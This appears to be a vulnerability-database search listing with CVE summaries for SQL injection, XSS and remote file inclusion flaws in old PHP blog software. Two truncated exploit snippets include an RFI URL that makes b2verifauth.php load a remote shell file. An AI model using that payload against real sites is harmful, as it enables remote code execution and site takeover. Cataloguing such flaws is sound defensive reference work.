5 matches found
CVE-2007-3889
Multiple SQL injection vulnerabilities in Insanely Simple Blog 0.5 and earlier allow remote attackers to execute arbitrary SQL commands via the currentsubsection parameter to index.php and other unspecified vectors...
CVE-2007-3888
Multiple cross-site scripting XSS vulnerabilities in Insanely Simple Blog 0.5 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the search action, possibly related to the term parameter to index.php; or 2 an anonymous blog entry, possibly involving the a postedby, b...
CVE-2006-6830
The CVE-2006-6830 entry describes a PHP remote file inclusion in b2 Blog 0.5 and earlier (b2verifauth.php) that lets an attacker execute arbitrary PHP code via the index parameter. Affected software: b2 Blog up to version 0.5 and earlier. Root cause: improper handling of the index URL parameter e...
b2 Blog 0.5 - b2verifauth.php Remote File Inclusion
b2 Blog 0.5 - b2verifauth.php Remote File Inclusion b2 - 0.5 index Remote File Ýnclude +class : Remote File Include Vulnerability + +Author : mdx +Files : +b2verifauth.php? +code : + + include$index; + + Exploit : ++ + http://www.site./path/b2verifauth.php?index=http://mdxshell.txt? +...
b2 Blog 0.5 - 'b2verifauth.php' Remote File Inclusion
b2 - 0.5 index Remote File Ýnclude +class : Remote File Include Vulnerability + +Author : mdx +Files : +b2verifauth.php? +code : + + include$index; + + Exploit : ++ + http://www.site./path/b2verifauth.php?index=http://mdxshell.txt? +...